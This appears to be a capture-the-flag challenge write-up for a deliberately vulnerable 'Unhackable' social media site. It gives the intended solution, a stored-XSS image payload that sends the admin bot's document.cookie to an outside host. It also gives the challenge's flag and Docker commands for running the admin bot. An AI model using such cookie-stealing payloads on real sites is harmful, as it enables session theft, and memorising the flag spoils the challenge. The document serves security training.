Level: Hard
We are creating a new social media platform called "Unhackable"!! And just to prove it, we've decided to hire you to make sure that it really *is* unhackable. If you find something fishy, send a link to our admin who will fix it!
FYI - to make sure you don't conspire against us, the "Find Friends" feature is disabled!
Site - http://byuctf.xyz:40005
Admin bot - http://byuctf.xyz:40006
Source code: [socialmedia.zip]
Basic XSS situation - the flag is the cookie of the admin. If you send a link of an infected note to the admin bot, the JavaScript code will be executed and they can grab the flag. A payload such as <img src="x" onerror="var myImage = new Image(100, 200); myImage.src = "https://justinapplegate.me/flag?cookie="+document.cookie;">
will work, and the flag can be found in the access logs of https://justinapplegate.me.
Flag - byuctf{xss_1s_a_v3ry_common_m3thod_of_attack!}
The main website can be spun up by running python3 unhackable.py
from the local directory. The admin bot uses a Docker container that makes a webserver that can be accessed port 40006. All the proper files are included in here. The command to build the docker container is (when located inside of the admin-bot
sudo docker build -t adminbot1 .
The command to start the challenge is:
sudo docker run -p 40006:1337 --detach --name adminbot1 adminbot1:latest
The command to stop the challenge (since CTRL+C
won't work) is:
sudo docker stop adminbot1